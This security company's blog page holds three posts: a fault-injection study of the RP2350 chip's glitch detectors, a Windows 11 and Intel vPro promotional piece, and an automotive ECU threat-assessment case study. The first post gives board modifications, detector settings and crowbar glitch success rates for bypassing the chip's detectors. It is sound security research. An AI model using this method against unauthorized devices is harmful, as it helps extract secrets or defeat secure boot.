INSIGHTS | July 31, 2025

Characterizing the Raspberry Pico 2 FI countermeasures – Part 1

Let’s start by saying that the Pico 2 – or more specifically, the RP2350 MCU – is an impressive chip. It’s powerful, packed with peripherals and features (I love the PIO!), easy to use and develop with, and from a security standpoint, exceptionally well designed.

After more than 10 years in chip security evaluations, I can confidently say that the RP2350 might be one of the most secure general-purpose, off-the-shelf MCUs on the market. I’ve evaluated enough chips to recognize when a system-on-chip (SoC) was designed with security in mind from the very beginning – integrating protection mechanisms early in the design phase – versus when security is treated as an afterthought, patched in late just to meet the minimum requirements. There’s no doubt: security was a top priority during the development of the RP2350.

The Raspberry Pi Foundation, clearly confident in their product, launched a bug bounty program offering €10,000 to the first person who could extract a secret stored in the Pico 2’s fuses. After a month without any successful claims, they doubled the reward to €20,000. To my knowledge, this is the first time a silicon developer has offered such a bounty – a commendable move.

That confidence is rooted in the chip’s well-engineered Secure Boot process and an effective glitch detector – both of which were tested extensively for months by two independent security firms prior to release. Still… it’s not perfect.

In January 2025, four winners for the challenge were announced, including IOActive’s Silicon Security team, which uncovered a novel method to invasively extract secrets from the RP2350 antifuse OTP. By leveraging a focused-ion-beam (FIB) microscope with passive voltage contrast (PVC), IOActive demonstrated an attack that challenges the long-standing assumption that antifuses are physically unreadable – posing a serious threat to any secure design that relies on them.

In addition to this invasive technique, this post – and those that follow – will document IOActive’s efforts to use fault injection (FI) to glitch and bypass the security protections of the Pico 2. This article assumes that the reader already has a basic understanding of fault injection. If not, I recommend reading up on the topic before proceeding.

The glitch detector

The RP2350 implements four glitch detectors, described in the datasheet as follows:

The idea behind these detectors is straightforward: the output of two D-latches is XORed to detect differences. If a glitch is injected, it may flip the state of only one of the latches, immediately triggering the detector. To detect glitches that could flip both latches, a delay is inserted in the feedback path of one of the latches. If the glitch flips both D-latches simultaneously, the delayed feedback would force the latches to take on different values on the next clock cycle and the detector would be triggered.
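
The two-latch scheme can be modeled in a few lines of C. The sketch below is a behavioral illustration of the principle just described – not the RP2350’s actual circuit – in which one latch follows the other through a delay element and the XOR of the two outputs is the detector output:

```c
#include <assert.h>
#include <stdint.h>

/* Behavioral model of the detector principle: two latches sample the
 * same signal, their outputs are XORed, and one latch is fed through a
 * one-cycle delay element. A fault that flips only one latch trips the
 * XOR immediately; a fault that flips both is caught one clock later,
 * when the delayed feedback pulls the latches apart again. */
typedef struct {
    uint8_t latch_a;
    uint8_t latch_b;
    uint8_t delayed_a;   /* previous value of latch_a (the delay element) */
} detector_t;

/* Advance one clock. fault_mask bit 0 / bit 1 flip latch A / latch B on
 * this cycle. Returns 1 when the detector trips (latch outputs differ). */
static int detector_clock(detector_t *d, unsigned fault_mask) {
    d->latch_b   = d->delayed_a;     /* B follows A through the delay */
    d->delayed_a = d->latch_a;
    if (fault_mask & 1u) d->latch_a ^= 1u;
    if (fault_mask & 2u) d->latch_b ^= 1u;
    return d->latch_a ^ d->latch_b;  /* XOR of the two latch outputs */
}
```

Clocking the model shows both cases from the text: a single-latch flip trips the XOR in the same cycle, while a double flip is masked for one cycle and then caught when the delayed feedback diverges.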

Each of the four detectors can be independently configured via the GLITCH_DETECTOR.SENSITIVITY register or the OTP fuse CRIT1.GLITCH_DETECTOR_SENS. There are four sensitivity levels available, allowing fine-tuned detection based on the expected operating environment.

When a glitch is detected, the GLITCH_DETECTOR.TRIG_STATUS register indicates which of the detectors were triggered. If the glitch detectors are armed – either by writing to the GLITCH_DETECTOR.ARM register or by programming the OTP fuse CRIT1.GLITCH_DETECTOR_ENABLE – a reset is asserted automatically upon detection. In such cases, the HAD_GLITCH_DETECT bit in the POWMAN.CHIP_RESET register is set, indicating that the last reset was caused by the glitch detector.
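
The configure/arm/inspect sequence can be sketched against a host-side mock of the register block. The register and field names below follow the datasheet names used above, but the struct layout, bit positions, and helper functions are assumptions for illustration – this is not the pico-sdk API:

```c
#include <assert.h>
#include <stdint.h>

/* Host-side mock of the GLITCH_DETECTOR register block. The field names
 * mirror the datasheet; the layout here is illustrative only. */
typedef struct {
    volatile uint32_t arm;
    volatile uint32_t sensitivity;
    volatile uint32_t trig_status;
} glitch_detector_regs_t;

static glitch_detector_regs_t mock_regs;  /* stands in for the real MMIO block */

/* The sensitivity values used throughout this article carry a 0xDE00
 * key in the upper half-word (e.g. 0xDE00FF00 for level 0). */
static void glitch_detector_set_sensitivity(glitch_detector_regs_t *gd,
                                            uint32_t value) {
    gd->sensitivity = value;
}

/* Count how many of the four detectors report a trigger. One status bit
 * per detector is an assumption of this mock. */
static int glitch_detector_count_triggered(const glitch_detector_regs_t *gd) {
    int n = 0;
    for (int i = 0; i < 4; i++)
        n += (int)((gd->trig_status >> i) & 1u);
    return n;
}
```

Reading `trig_status` this way, without arming the detectors, is exactly the monitoring-without-reset mode that the characterization campaigns below rely on.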

Interestingly, it’s possible to monitor the output of the glitch detectors without triggering a reset – a feature that proves very useful when characterizing the detectors and tuning glitch parameters during testing.

The fact that the chip includes only four glitch detectors raises an important question: how resilient is this design against localized fault injection? It’s clear that a focused laser fault injection (L-FI) attack could bypass these detectors. This has been demonstrated by the winner of the Pico 2 challenge, Kévin Courdesses, who modified an OpenFlex microscope to inject laser glitches.

But what about more common localized FI methods, like electromagnetic fault injection (EMFI) or body-bias injection (BBI)? That’s something we’ll explore in a future post, but Thomas Roth has already demonstrated that such an attack is feasible.

Characterizing the CPU with crowbar glitching

The first step in our evaluation was to assess the CPU’s sensitivity to voltage glitches. For this initial fault injection (FI) campaign, we disabled all glitch detectors – setting the sensitivity level to 0 and not arming them – in order to observe the CPU’s raw behavior without any interference from built-in protections and countermeasures.

For the glitching technique, we opted for crowbar switching, one of the most widely used methods in voltage fault injection. Its popularity stems largely from the simplicity and affordability of the hardware required. However, crowbar switching also offers technical advantages over other voltage glitching methods, which we’ll discuss later. In future posts, we’ll also cover results obtained using a DAC to generate voltage glitches and compare the two approaches in terms of effectiveness and control.

To inject the glitches, we used a tool called Glitch.IO. This tool is an in-house development based on the Raspberry Pi Pico, like many other glitchers, but with several unique features not previously seen in similar tools. Some of these features will be introduced throughout this series of posts. Glitch.IO will be released as open hardware during Black Hat USA 2025.

Modifying the Pico2 board

Before performing glitching experiments on the Raspberry Pi Pico 2, we first needed to modify the board to isolate the CPU power plane and remove its associated capacitance.

According to the datasheet (see Figure 3), the RP2350 features five power supply domains. However, only one is relevant for our purposes: DVDD – the 1.1V rail that powers the CPU core. This is the supply line where we’ll be injecting our glitches. The remaining power supplies operate at 3.3V and are not initially of interest for this stage of testing.

To reduce the bill of materials (BOM) and simplify the PCB design, the RP2350 chip has an integrated Switched-Mode Power Supply (SMPS) that can generate the 1.1V rail from the 3.3V rail.

Referring to the Raspberry Pi Pico 2 schematics (available as an annex in the datasheet), we identified the decoupling capacitors on the DVDD power plane: C9, C11, and C12. These were removed to reduce the capacitance on the DVDD line, making the PCB more susceptible to glitches. Additionally, since we plan to perform DAC-based glitching and supply custom voltage profiles to the core, we had to isolate the DVDD pins from the SMPS output. To do this, we cut the trace connecting the 1.1V line to VREG_FB, effectively decoupling the internal regulator. We then supplied power directly to the DVDD rail using test point TP7 and an external power supply. 

Figure 4 shows all of the modifications done in the schematic, and Figure 5 shows those modifications on the PCB.

The test application

To characterize the target, we developed a standard “for loop” test application, shown in Figure 6, that runs on the Raspberry Pico 2. Before entering the loop, the glitch detectors are configured. After the loop completes, the application prints the status of the detectors.
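
A minimal sketch of such a characterization loop is shown below. The Figure 6 code is not reproduced in this article, so the loop bounds and structure here are assumptions; the essential property is that an unglitched run always produces the same counter value, so any deviation reveals a fault:

```c
#include <assert.h>
#include <stdint.h>

#define LOOP_OUTER 1000u
#define LOOP_INNER 1000u

/* The classic nested counting loop used to characterize FI targets.
 * An unglitched run returns exactly LOOP_OUTER * LOOP_INNER; any other
 * value means a fault disturbed the computation. */
static uint32_t run_target_loop(void) {
    volatile uint32_t count = 0;  /* volatile: keep the loop from being folded away */
    for (uint32_t i = 0; i < LOOP_OUTER; i++)
        for (uint32_t j = 0; j < LOOP_INNER; j++)
            count++;
    return count;
}

/* Returns 1 when the counter deviates from the expected value. */
static int loop_was_glitched(uint32_t count) {
    return count != LOOP_OUTER * LOOP_INNER;
}
```

On the real target, the counter value is reported over UART together with the detector status, which is how the harness distinguishes a successful glitch from a detected one.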

The goal of this fault injection (FI) campaign is to determine the optimal glitch parameters that can disrupt the execution of the loop without triggering the glitch detectors.

The glitch application

The glitching tool must run an application responsible for four key tasks:

                  1. Preparing the target device for glitching

                  2. Waiting for a trigger

                  3. Injecting the glitch

                  4. Evaluating the target’s response and the glitch’s effects
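
The four steps above form the core loop of any glitching application. Sketched in C – all of the names here are hypothetical illustrations, not the Glitch.IO API – the steps become pluggable components:

```c
#include <assert.h>
#include <stddef.h>

/* A glitch "recipe" wires together pluggable components, modeled here
 * as function pointers. All names are hypothetical illustrations of
 * the four-step loop described in the text. */
typedef struct {
    void (*prepare_target)(void);  /* 1. put the device in a known state */
    int  (*wait_trigger)(void);    /* 2. block until the trigger fires   */
    void (*inject_glitch)(void);   /* 3. fire the crowbar/DAC/etc.       */
    int  (*evaluate)(void);        /* 4. classify the target's response  */
} recipe_t;

/* Run one glitch attempt; returns the evaluation result, or -1 when the
 * trigger never arrived. */
static int run_attempt(const recipe_t *r) {
    r->prepare_target();
    if (!r->wait_trigger())
        return -1;
    r->inject_glitch();
    return r->evaluate();
}

/* Trivial mocks for a dry run on the host. */
static int  attempts_run = 0;
static void mock_prepare(void)  { attempts_run++; }
static int  mock_trigger(void)  { return 1; }
static void mock_inject(void)   { }
static int  mock_evaluate(void) { return 0; /* "normal" outcome */ }
```

Separating the four roles this way is what lets a single harness swap glitching techniques or trigger sources without touching the attack logic.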

The Glitch.IO SDK simplifies the development of such applications. It provides a collection of modular classes designed to abstract and streamline the glitching process:

  • Glitchers: Implement different glitching techniques, such as crowbar, DAC-generated glitches, clock glitches, reset glitches, and MUX switching.
  • Triggers: Define how glitches are synchronized, supporting a variety of trigger sources (e.g., GPIO rise/fall, reset lines, UART RX/TX).
  • Protocols: Implement generic communication protocols like SWD, JTAG, etc.
  • Targets: Define the specific attack or test logic – for example, attacking secure boot, bypassing debug protections, or characterizing glitch sensitivity.

These components are instantiated and combined to form a “recipe” – an application that implements a specific attack on a specific device. Figure 7 represents the software architecture of a Glitch.IO application, and the following code shows the recipe used to characterize the Raspberry Pico 2.

In this recipe, glitch parameters and their variation strategies are defined in initializeParameters(). In main(), we instantiate and wire together the glitcher, trigger, and target components.

The Glitch.IO SDK also includes example recipes for common FI attacks against popular MCUs from vendors like NXP and ST – making it easy to get started with real-world targets.

The FI campaign

The glitch detectors in the RP2350 can be configured at four different sensitivity levels. For each level, we ran a series of FI campaigns: starting with broad glitch parameter sweeps and then progressively narrowing them down in an attempt to maximize the success rate – defined as glitches that disrupt execution without being detected.

Throughout the campaigns, we logged two key outcomes:

  • Whether the glitch was successful (i.e., it altered the behavior of the for loop).
  • Which glitch detectors, if any, were triggered.

All tests were performed using an external 1.1V power supply, and the chip was reset after each glitch attempt to ensure a consistent starting state.

During testing, the injected glitches produced a variety of observable effects. We classified the results into the following categories:

  • Normal: The glitch had no observable effect on chip behavior.
  • Reset: The glitch caused a system crash or full reset.
  • Success: The loop counter was altered, but no glitch detectors were triggered.
  • Detected 1–4: The loop counter was altered, and one to four glitch detectors were triggered, respectively.
  • Unknown: The device printed unexpected characters, suggesting some level of corruption.
  • Error: Any other unclassified or abnormal behavior.
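
The categories above map onto a small decision function. The sketch below is illustrative – in particular, the treatment of a detector trip with no loop effect as Error is an assumption, as the article does not classify that edge case explicitly:

```c
#include <assert.h>

typedef enum {
    RES_NORMAL,    /* no observable effect                     */
    RES_RESET,     /* crash or full reset                      */
    RES_SUCCESS,   /* counter altered, no detectors triggered  */
    RES_DETECTED,  /* counter altered, 1-4 detectors triggered */
    RES_UNKNOWN,   /* unexpected characters on the UART        */
    RES_ERROR      /* anything else                            */
} fi_result_t;

/* Classify one attempt from what the harness observed:
 *   reset     - the board rebooted,
 *   altered   - the loop counter deviated from the expected value,
 *   detectors - how many glitch detectors reported a trigger (0..4),
 *   garbage   - unexpected characters arrived on the UART. */
static fi_result_t classify(int reset, int altered, int detectors, int garbage) {
    if (reset)     return RES_RESET;
    if (garbage)   return RES_UNKNOWN;
    if (altered)   return detectors ? RES_DETECTED : RES_SUCCESS;
    if (detectors) return RES_ERROR;  /* detected, but no loop effect */
    return RES_NORMAL;
}
```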

The following sections summarize the results of the fault injection characterization campaigns, organized by glitch detector sensitivity level.

Sensitivity Level 0 (glitch_detector_hw->sensitivity=0xDE00FF00)

At this lowest sensitivity level, the glitch detectors are effectively disabled – they appeared to be nonfunctional and could not be triggered. This allowed us to focus purely on the CPU’s sensitivity to glitches, without interference from detection mechanisms.

We conducted three separate FI campaigns at this level, progressively narrowing the glitch parameters (e.g., delay and length) to identify the most effective combinations.

Figure 8 shows the plots of the glitch results. A clear boundary is visible between the green and yellow zones: this is where the glitch becomes too long or powerful, consistently crashing the target. The red points appear along this boundary, but only at specific delay values – those that align precisely with the execution of the instruction that, when glitched, breaks the loop. This correlation provides strong insight into the CPU’s timing sensitivity and the ideal glitch injection window. The highest success rate achieved was almost 14%.

The following tables summarize the results for these campaigns:

LEVEL 0 (glitch_detector_hw->sensitivity=0xDE00FF00)

Sensitivity Level 1 (glitch_detector_hw->sensitivity=0xDE00AA55)

At this sensitivity level, the glitch detectors were still unable to detect any of the injected glitches. The results were largely indistinguishable from those observed at Sensitivity Level 0.

Due to the lack of significant behavioral differences, only a single short campaign was conducted at this level to confirm the similarity. No glitches were detected, and successful fault injections continued to occur under the same timing and voltage conditions as before.

The following tables summarize the results for this campaign:

LEVEL 1 (glitch_detector_hw->sensitivity=0xDE00AA55)

Sensitivity Level 2 (glitch_detector_hw->sensitivity=0xDE0055AA)

This is the first sensitivity level at which the glitch detectors were successfully triggered by our fault injections. However, it was still relatively easy to bypass the detectors under certain conditions.

In the plot shown in Figure 10, additional colors indicate the number of detectors triggered during successful glitches – that is, glitches that broke the loop logic but were nonetheless detected:

  • Blue: 1 detector was triggered
  • Magenta: 2 detectors were triggered
  • Cyan: 3 detectors were triggered
  • Purple: All 4 detectors were triggered

To improve clarity, a second version of the plot is included, where green (normal glitches) and yellow (reset events) have been removed, making it easier to focus on detection behavior.

A success rate of nearly 7% was achieved in this campaign – relatively high, considering this was the third level of sensitivity. These results suggest that while detection is now functional, the protection can still be bypassed with a well-timed and well-parameterized glitch.

The following tables summarize the different campaigns conducted at this sensitivity level and their respective outcomes.

LEVEL 2 (glitch_detector_hw->sensitivity=0xDE0055AA)

Sensitivity Level 3 (glitch_detector_hw->sensitivity=0xDE0000FF)

At this highest sensitivity level, the glitch detectors become very effective. Although we were still able to achieve some successful glitches, the success rate dropped significantly.

An initial campaign using broader parameters resulted in a small number of successful glitches. A second campaign attempted to narrow the parameter range based on what had worked at Sensitivity Level 2 but yielded no successful results. In hindsight, this was likely due to insufficient glitch attempts.

A third and final campaign expanded the narrowed parameter range slightly and achieved a modestly improved success rate. However, even then the rate was only about 0.0002%, indicating that the detectors are highly effective at this level.

One interesting observation is that while at Sensitivity Level 2, many glitches triggered only one, two, or three detectors, at Sensitivity Level 3, glitches almost always triggered all four detectors.

The following plots show the two campaigns with broader parameters. In the right-hand plots, green and yellow dots are removed to better highlight successful red points.

Additional campaigns (not included in this article) attempted to further refine parameters around previously successful glitches, but did not yield any improvement in the success rate. 

The following tables summarize the results for the three campaigns conducted at this sensitivity level.

LEVEL 3 (glitch_detector_hw->sensitivity=0xDE0000FF)

Conclusions

Our experiments demonstrate that the RP2350’s glitch detectors are highly effective – but only when configured at the highest sensitivity level. At Sensitivity Levels 0 and 1, the detectors provided no meaningful protection. Sensitivity Level 2 reduced the success rate significantly, but not enough to prevent a fault injection (FI) attack (almost a 7% success rate).

Even at Sensitivity Level 3, it was still possible to glitch the RP2350, albeit with a very low success rate of approximately 0.00016% – or roughly one successful glitch every 625,000 attempts. Given that our setup could inject glitches at around 30 attempts per second, this translated to an average attack time of under six hours to achieve a successful result.
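
The attack-time estimate works out directly from the numbers above – a success rate of 0.00016% means one success per 625,000 attempts, and at roughly 30 attempts per second that averages out to about 5.8 hours:

```c
#include <assert.h>

/* Convert a success rate expressed as a percentage into the mean number
 * of attempts per successful glitch (1 / rate). */
static double attempts_per_success(double success_rate_percent) {
    return 100.0 / success_rate_percent;
}

/* Mean wall-clock time to one success, in hours, at a given attempt rate. */
static double mean_hours_to_success(double success_rate_percent,
                                    double attempts_per_second) {
    return attempts_per_success(success_rate_percent)
           / attempts_per_second / 3600.0;
}
```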

However, it’s crucial to place these results in context to properly evaluate the real-world risk of using the RP2350 in a security-critical application.

All experiments were conducted under ideal lab conditions:

  • Full control over the target
  • Precise and reliable trigger signals
  • Fast reset cycle
  • A test application that executes the vulnerable instruction repeatedly, every few clock cycles

These ideal conditions greatly increased our odds of success. In contrast, a real-world attack would face substantial challenges:

  • Limited or no access to CPU internals
  • Unreliable or noisy trigger sources
  • Potentially long and variable reset/restart times
  • Application code that executes sensitive operations infrequently or unpredictably

Introducing software countermeasures – such as instruction-level redundancy or random delays – would further reduce the success rate, often requiring multiple or perfectly timed glitches. Under such constraints, an attacker may require several months to mount a successful attack using crowbar-based glitching alone.

In future articles, we’ll explore whether the same conclusions hold for other glitching techniques, such as DAC-generated glitches or electromagnetic fault injection (EMFI).

WHITEPAPER | July 29, 2025

Windows 11 Upgrade – The Hardware Security Focused Refresh

Windows 10’s End of Life (EoL) is slated for October 14th, 2025. After this date, it will no longer be supported, and businesses are expected to upgrade to Windows 11. However, this upgrade is unlike previous Windows upgrades: strict hardware requirements must be met to support Windows 11. The transition from Windows 10 to Windows 11 represents a major inflection point for enterprise IT and SecOps; the hardware requirements exist to strengthen overall cybersecurity, as Windows moves from a primarily software security model to a best-of-both-worlds hardware and software model. In this blog post, we discuss in detail the benefits of this upgrade through Intel vPro®. This work is part of the research IOActive published in a recent white paper, which was commissioned by Intel®.

IOActive works closely with both Microsoft and silicon security vendors. In this blog post, we focus on how PCs powered by Intel® Core™ Ultra processors and Intel vPro® offer a compelling strategy for Windows 11 upgrades.

Windows 10 was launched in 2015 with a comprehensive software-based security feature list,[1] including Windows Defender Antivirus, Windows Firewall, and data encryption technologies like BitLocker. However, software-based solutions can only take you so far in protecting data and systems and can still be vulnerable to sophisticated malware, zero-day attacks, and other Advanced Persistent Threats (APTs).

Windows 11 shifts focus from a software-only approach to a best-of-both-worlds software-and-hardware-based security solution,[2] providing a more robust, tamper-resistant security posture and helping ensure “secure by default” and “secure by design” principles.

Modern Copilot+ PCs, such as those powered by Intel Core Ultra Processors (200v Series), are built with security at their foundational level. At the heart of this enhanced security is the Microsoft Pluton security processor. Enabled by default, Pluton is designed to protect sensitive assets like credentials, encryption keys, and user identities by isolating them from potential attackers, even if they gain full access to the system.

Taking this to the next level, Microsoft designed Secured-core PCs to deliver “On-By-Default” security for businesses and users, built on three core pillars of protection:

  • Protecting identities from external threats
  • Securing the operating system from malware
  • Defending against hardware and firmware attacks

To properly support these secure pillars, specific hardware security requirements are necessary.

Microsoft Secured-core PCs are designed to provide an extra layer of protection against firmware, hardware, and software attacks, offering three tiers of protection.

These baseline security features are essential for SecOps teams aiming to reduce attack surfaces and ensure system integrity:

  • Secure Boot to block malicious code during startup.
  • TPM 2.0 for secure credential and key storage.
  • Hypervisor Code Integrity (HVCI) Capable (Memory Integrity) for kernel-level code integrity.

To meet the enhanced hardware security requirements, all of the standard hardware security features must be enabled, as well as HVCI:

  • HVCI enabled, enforcing runtime code integrity to block advanced exploits

For organizations with high security requirements, these advanced capabilities offer deeper resilience:

  • Dynamic Root of Trust for Measurement (DRTM) to verify integrity during the boot process.
  • System Management Mode (SMM) Protection to isolate critical system functions from the OS.

This multi-tiered model helps enterprises align endpoint protections with their specific risk profile and compliance needs.

Inside Intel vPro

Intel vPro systems are built for enterprise environments requiring robust security, high performance, and strong manageability. They deliver over 30 hardware-enabled protections that extend Windows 11’s security model.

01. Out of Box – Security at First Boot

Every Intel vPro-based system with Windows 11 ships with essential security features pre-enabled. This “secure by default” approach ensures rapid deployment without sacrificing protection.

02. Intel vPro Surpasses Microsoft Secured-core PC L3 Requirements

Intel vPro goes beyond even the higher requirements of Secured-core PC, with additional security features and services to help SecOps teams with the deployment and support of their hardware fleet.

  • Intel Total Memory Encryption – Multi-Key (TME-MK) helps prevent data exposure from physical memory attacks.
  • Intel Virtualization Technology – Redirect Protection (VT-rp) strengthens isolation in multi-tenant and hybrid environments.
  • Intel Threat Detection Technology (TDT) provides AI-driven detection of advanced threats like ransomware.
  • Intel Active Management Technology (AMT) – BSOD Recovery enables remote remediation even after crashes.
  • Intel Innovation Platform Framework (IPF) – Device Discovery offers real-time visibility into device configurations and status.

Deploying Intel vPro-based systems with Microsoft Pluton on Windows 11 ensures your business is not only compliant but also strategically prepared for tomorrow’s cybersecurity challenges. This is more than just protection; it’s long-term operational resilience.

03. Third-Party Assessed for Compliance

These capabilities are third-party validated against compliance standards such as NIST SP800-193, SP800-147, and SP800-155, easing audit and certification processes for industries like healthcare, finance, and government.

04. Industry Driven Validation

Earlier this year, in collaboration with Microsoft, CrowdStrike, and AttackIQ, Intel mapped and ranked the hardware-optimized software security features against the MITRE ATT&CK framework, using the full set of Intel vPro security protections – some 30 hardware features – on a typical enterprise security software stack. This provided, in total, 90 hardware mitigations against real-world attacks when using Windows 11 and Windows Defender.

05. Achieve Enterprise-Class Security Posture

Together, Intel vPro and Pluton form a layered defense strategy that empowers IT leaders to confidently enforce zero-trust architectures, ensure business continuity, and scale securely in hybrid or cloud-native environments.

Conclusion

Upgrading from Windows 10 to Windows 11 is more than a user experience refresh; it’s a strategic opportunity to modernize your organization’s security architecture. With built-in protections, Windows 11 sets a new baseline for device security.

For enterprises, the transition brings a clear advantage: by pairing Windows 11 with Intel vPro, organizations can go beyond compliance and exceed Secured-core PC requirements with hardware-enhanced capabilities like Intel TME-MK, Intel VT-rp, Intel TDT, and Intel AMT. These features offer operational benefits for SecOps teams, from accelerated recovery and advanced threat detection to improved device visibility and remote manageability.

This transition offers a rare out-of-the-box uplift for security and IT teams, delivering stronger protection without the complexity of traditional large-scale security projects.

Download our free white paper for more technical background around this mandatory update. 


[1] https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10

[2] https://www.microsoft.com/insidetrack/blog/hardware-backed-windows-11-empowers-microsoft-with-secure-by-default-baseline/

CASE STUDY | July 14, 2025

Accelerating Threat Assessment in Vehicle ECUs

A global automaker required a thorough, but time-constrained, threat assessment and remediation plan for its critical Gateway Electronic Control Unit (ECU). The assessment needed to cover not only the main ECU but also its networked interaction with all of the vehicle’s numerous ECUs.

Having attempted to perform the assessment on its own, the manufacturer found its initial results lacked sufficient technical depth and were taking too long to report, threatening other key project timelines. They turned to IOActive to not only improve but also to accelerate the assessment process for this product.

The Challenge

An automotive Gateway ECU acts as a hub, routing and securing communication between back-end services and ECUs such as those for the engine, transmission, brakes, steering, and infotainment. However, because it sits atop the vehicle’s digital nervous system, any compromise of the Gateway ECU can cascade to other subsystems through the entire in-vehicle network, including the Controller Area Network (CAN) bus and newer technologies like vehicular Ethernet. This widespread connectivity amplifies the potential for catastrophic results if vulnerabilities are exploited. Ensuring that any conceivable threats are accounted for and prioritized for remediation is a critical step in overall vehicle safety in the modern era.

In this case, the automaker was looking to certify the reliability and security posture of its Gateway ECU in accordance with ISO/SAE 21434, the international standard that specifies requirements for cybersecurity risk management in the design and development of automotive systems. The purpose of ISO 21434 is to establish a comprehensive framework for managing cybersecurity risks throughout the entire lifecycle of a vehicle, and ensure that automotive systems are designed with cybersecurity in mind from the outset, continually addressing potential vulnerabilities and threats.

ISO 21434 applies to all stages of a vehicle’s lifecycle, including concept, development, production, operation, maintenance, and decommissioning. It covers all electronic and electrical systems within the vehicle, including software, hardware, and communication interfaces.

Enter TARA

A critical component of ISO 21434 is a risk assessment process known as Threat Analysis and Risk Assessment (TARA). A TARA’s risk-based approach involves systematically identifying potential damage scenarios, threat scenarios, and attack paths, evaluating their impact and attack feasibility, and determining the risk to decide appropriate mitigation strategies.

Given their tight project timelines, what the automaker needed was a specialized consulting service with core competencies focused on the use of TARA in an automotive system. That’s where IOActive comes in, as a research-driven security services company with a history of automotive testing and ethical hacking that dates to the earliest days of digital vehicle control systems.

In the context of automobile control systems, a meaningful TARA program is structured to ensure all potential security risks are identified, assessed, and prioritized for mitigation. Potential vectors include physical threats (when a malicious actor has hands-on access to a vehicle, for example) and wireless threats (for hacking attempts leveraging the vehicle’s on-board cellular and WiFi connectivity).

For this automaker client, IOActive organized the highly technical TARA to include the following tasks.

Initiation and Planning

  • Defining scope: Clearly outlining the scope of the TARA, specifying which systems, components, and interfaces related to the vehicle Gateway ECU are to be included.
  • Establishing objectives: Setting the goals for the TARA, such as agreeing on impact rating, attack feasibility, and risk calculation details, understanding the client’s concerns or key areas of focus, and establishing initial assumptions about the item along with the process for confirming and documenting any assumptions needed during the execution of the TARA.
  • Assembling the team: Forming a multidisciplinary team with expertise in cybersecurity, automotive systems, threat modeling, TARAs, software, hardware, and relevant regulatory standards (e.g., ISO 21434).

Asset Identification (Section 15.3)

  • Discovery: Determining and defining critical assets within the item, by reviewing the software modules, hardware components, data flows, dependencies, and communication interfaces.
  • Damage scenarios: Determining if a compromise of a cybersecurity property of any asset would cause some form of harm to the road user.

Threat Scenario Identification (Section 15.4)

  • Identifying threat sources: Cataloging potential sources of threats, such as external attackers, malicious insiders, and natural events.
  • Enumerating threat scenarios: Developing threat scenarios to describe how each identified damage scenario can be exploited in the item.

Impact Rating (Section 15.5)

  • Impact analysis: Evaluating the potential impact of each damage scenario on the vehicle’s safety, as well as financial, operational, and privacy impacts. This includes both direct and indirect consequences.   

Attack Path Analysis and Attack Feasibility Rating (Section 15.6 and 15.7)

  • Attack path generation: Building a series of steps that could be used to realize a threat scenario that would result in damage. The standard doesn’t specify how this is done, but IOActive breaks attack paths into the following steps:
    • Primary Attack (Intrusion Vector)
    • Secondary Attack (Escalation Vector)
    • Tertiary Attack (Lateral Movement Vector)
    • Final Attack (Exploitation Phase)
  • Attack Feasibility Rating: Assessing the likelihood of each attack path occurring based on factors such as existing security measures, ease of exploitation, and known attacker capabilities.

Risk Value Determination (Section 15.8)

  • Risk scoring: Assigning risk scores to each valid attack path based on the combined assessment of impact and attack feasibility. This helps prioritize the threats.
  • Risk categorization: Categorizing the risks into different levels to help facilitate the client’s risk treatment decision-making.
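
ISO/SAE 21434 does not mandate a specific formula for combining impact and attack feasibility; a common approach is a lookup matrix that yields a risk value from 1 to 5. The matrix values and enum names below are purely illustrative, not taken from the standard or from this engagement:

```c
#include <assert.h>

/* Illustrative ISO/SAE 21434-style risk determination: impact (rows) x
 * attack feasibility (columns) -> risk value 1..5. The standard leaves
 * the combination method open; these values are an example only. */
typedef enum { IMP_NEGLIGIBLE, IMP_MODERATE, IMP_MAJOR, IMP_SEVERE } impact_t;
typedef enum { AF_VERY_LOW, AF_LOW, AF_MEDIUM, AF_HIGH } feasibility_t;

static const int risk_matrix[4][4] = {
    /*              very-low  low  medium  high */
    /* negligible */ { 1,      1,   1,      1 },
    /* moderate   */ { 1,      2,   2,      3 },
    /* major      */ { 1,      2,   3,      4 },
    /* severe     */ { 2,      3,   4,      5 },
};

/* Look up the risk value for one attack path. */
static int risk_value(impact_t impact, feasibility_t feasibility) {
    return risk_matrix[impact][feasibility];
}
```

A matrix like this is what makes the subsequent prioritization repeatable: every valid attack path gets a defensible score rather than an ad-hoc ranking.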

Risk Treatment Decision (Section 15.9)

  • Developing mitigation strategies: Proposing specific measures to mitigate the identified risks. This can include technical controls (e.g., encryption or authentication), process changes (e.g., regular security updates), and organizational measures (e.g., training or policy changes).
  • Residual risk assessment: Guidance on assessing the residual risk after implementing the mitigation measures to ensure that risk is reduced to acceptable levels.

Documentation and Reporting

  • Comprehensive documentation: Maintaining detailed documentation of the TARA process, including all damage scenarios, threat scenarios, and steps that form attack paths.
  • Reporting: Preparing reports for key stakeholders that summarize the findings, any actions taken, proposed future actions for the client, and the item’s current security posture.

The Assessment in Depth

Adhering to this systematic implementation of the TARA methodology, IOActive’s security consultants began with the detailed documentation review required to expose potential attack vectors that malicious actors could exploit. This process is much like a threat model, in which our team identified potential risks and missing controls, ranging from weak encryption practices to inadequate access controls and insecure communication protocols. Each weakness was examined in depth to help identify areas of potential risk to vehicle functionality, safety, and privacy.

Over the course of the two-month TARA process, IOActive’s automotive security team discovered multiple high-impact risks:

  • The automaker’s control systems did not yet support intra-ECU authentication and authorization. These missing controls could allow an attacker to wreak havoc across multiple vehicle systems after a single compromise of a lower-value component.
  • The vehicle’s communications and control networks also lacked appropriate segmentation, which, like the authentication and authorization issue, could facilitate an attack on multiple ECUs from a single point of compromise.
  • Access to the cryptographic material used by the ECU was poorly understood and documented, which could complicate the assessment of system impact and the identification of compromised keys in the event of an attack.

Throughout the course of the TARA engagement, IOActive’s expert consultants kept in constant contact with the client, asking probing questions about development and architecture that spurred the automaker’s own technical team to revisit core component security questions — and consider strategic changes to its products — with company decision makers.

The Results

IOActive completed the TARA within an impressive two-month timeframe, delivering results that surpassed those typically achieved by internal teams or other vendors. Leveraging our extensive experience across a diverse range of vendors and OEMs, IOActive provided the automaker with a detailed, realistic, and actionable roster of risks, each analyzed with significant technical depth and prioritized by practical risk level. Our experts’ broad spectrum of exposure enables a more thorough and insightful threat assessment, helping to ensure that potential security gaps are not overlooked.

